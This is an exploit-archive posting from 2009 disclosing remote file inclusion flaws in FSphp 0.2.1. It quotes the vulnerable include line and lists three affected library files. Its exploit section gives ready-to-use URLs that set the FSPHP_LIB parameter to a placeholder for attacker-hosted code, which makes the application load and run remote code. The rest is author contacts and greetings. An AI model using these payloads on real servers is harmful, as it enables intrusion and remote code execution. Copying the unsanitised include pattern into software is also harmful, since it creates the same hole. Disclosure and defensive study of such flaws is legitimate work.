[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : FSphp 0.2.1 Multiple Remote File Inclusion Vulnerabilities
# Published : 2009-09-18
# Author : NoGe
# Previous Title : FanUpdate 2.2.1 show-cat.php SQL Injection Vulnerability
# Next Title : Joomla Component com_album 1.14 Directory Traversal Vulnerability
==============================================================================
[o] FSphp 0.2.1 Multiple Remote File Inclusion Vulnerabilities
Software : FSphp version 0.2.1
Vendor : http://fsphp.sourceforge.net/
Download : http://sourceforge.net/projects/fsphp/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
==============================================================================
[o] Vulnerable file
include_once $FSPHP_LIB . "/path.php" ;
lib/FSphp.php
lib/navigation.php
lib/pathwirte.php
[o] Exploit
http://localhost/[path]/lib/FSphp.php?FSPHP_LIB=[evilc0de]
http://localhost/[path]/lib/navigation.php?FSPHP_LIB=[evilc0de]
http://localhost/[path]/lib/pathwirte.php?FSPHP_LIB=[evilc0de]
==============================================================================
[o] Greetz
Anti Security [ http://antisecurity.org ]
Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe
H312Y yooogy mousekill }^-^{ martfella noname s4va
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
[o] Note
SELAMAT HARI RAYA IDUL FITRI
MOHON MAAF LAHIR BATIN
==============================================================================
# www.Syue.com [2009-09-18]